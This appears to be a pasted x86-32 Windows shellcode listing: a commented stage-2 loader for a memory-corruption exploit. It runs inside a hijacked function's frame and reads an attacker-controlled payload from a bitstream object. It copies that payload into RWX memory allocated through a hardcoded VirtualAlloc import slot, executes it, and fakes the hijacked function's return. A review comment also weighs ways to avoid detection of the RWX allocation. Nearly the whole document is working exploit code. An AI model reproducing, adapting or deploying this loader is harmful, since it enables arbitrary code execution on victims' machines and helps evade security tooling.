Hidend

Untitled

Apr 15th, 2024
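  ;# ---------------------------------------------------------------------
  ;# Stage-2 loader shellcode (x86-32, Intel syntax, Windows user mode).
  ;#
  ;# Entry assumptions (all target-build specific, taken from the listing):
  ;#   - we run inside a hijacked function's frame with ebp still valid;
  ;#   - [ebp+0x3c] points at an object ("caption") located 0x118 bytes past
  ;#     a bitstream object laid out as
  ;#        +0x0  numberOfBitsUsed   (in bits)
  ;#        +0x8  readOffset         (in bits)
  ;#        +0xC  data               (byte pointer)
  ;#   - [0x008581A4] holds the address of VirtualAlloc (presumably an IAT
  ;#     slot of the target binary -- TODO confirm, it changes per build).
  ;#
  ;# The bytes in [data + readOffset/8, data + numberOfBitsUsed/8) are copied
  ;# into a fresh RWX allocation and executed from their FIRST byte, so the
  ;# payload must start with position-independent code (e.g. a reflective
  ;# loader stub); a raw PE image would not run from this `call`.  Afterwards
  ;# we unwind as if the hijacked function had returned 1.
  ;#
  ;# Changes vs. the original paste: readOffset > numberOfBitsUsed (which
  ;# produced a ~4 GiB size) now bails out, and a NULL return from
  ;# VirtualAlloc no longer leads to `rep movsb` / `call` through address 0.
  ;# The redundant `jmp epilogue` before the epilogue label was dropped.
  ;# ---------------------------------------------------------------------

  ;# repair stack: point esp at the hijacked frame's saved edi/esi/ebx so the
  ;# pops in the epilogue find them (0x128 is specific to the target frame)
  lea esp, [ebp-0x128]

  ;# locate the bitstream and compute the payload window
  mov eax, [ebp+0x3c]             ;# caption
  sub eax, 0x118                  ;# bitstream = caption - 0x118
  mov ecx, [eax]                  ;# numberOfBitsUsed
  mov edx, [eax+0x8]              ;# readOffset
  mov esi, [eax+0xC]              ;# data ptr
  add ecx, 7                      ;# numberOfBitsUsed: bits -> bytes, rounded up
  shr ecx, 3
  add edx, 7                      ;# readOffset: bits -> bytes, rounded up
  shr edx, 3
  sub ecx, edx                    ;# ecx = payload size in bytes; CF=1 on underflow, ZF=1 if empty
  jbe epilogue                    ;# size == 0 or readOffset > numberOfBitsUsed: nothing sane to load
  add esi, edx                    ;# esi = data + readOffset = payload ptr (after the jbe: add clobbers flags)

  ;# VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
  ;# NOTE(review): one RWX allocation is a well-known detection trigger; RW
  ;# followed by VirtualProtect to RX after the copy is quieter, but needs a
  ;# second resolved import that this shellcode does not have.
  push ecx                        ;# save size across the call (ecx is caller-saved)
  push 0x40                       ;# flProtect = PAGE_EXECUTE_READWRITE
  push 0x3000                     ;# flAllocationType = MEM_COMMIT | MEM_RESERVE
  push ecx                        ;# dwSize = payload size
  push 0                          ;# lpAddress = NULL (let the kernel choose)
  mov eax, dword ptr [0x008581A4] ;# VirtualAlloc (see header: build-specific slot)
  call eax                        ;# stdcall: callee pops its 4 args, esp is back at the saved ecx
  pop ecx                         ;# restore size (pop does not alter flags)
  test eax, eax
  jz epilogue                     ;# allocation failed: do not copy to / call through NULL
  mov edi, eax                    ;# edi = copy destination; eax keeps the base for the call below

  ;# copy payload: rep movsb consumes esi/edi/ecx and assumes DF = 0 (Win32 ABI default)
  rep movsb

  ;# execute payload from its first byte. The callee must return with esp
  ;# unchanged: the epilogue pops saved registers from esp BEFORE it resets
  ;# esp from ebp, so a stub that leaks stack corrupts edi/esi/ebx for the caller.
  call eax
  ;# falls through into the epilogue

  epilogue:
  ;# emulate the hijacked function's own epilogue: restore its callee-saved
  ;# registers from the frame and hand its caller a return value of 1
  pop edi
  pop esi
  mov eax, 1                      ;# return value (1 / TRUE) to the hijacked function's caller
  pop ebx
  mov esp, ebp
  pop ebp
  ret 8                           ;# stdcall-style cleanup of 8 bytes of args (presumably two DWORDs -- TODO confirm)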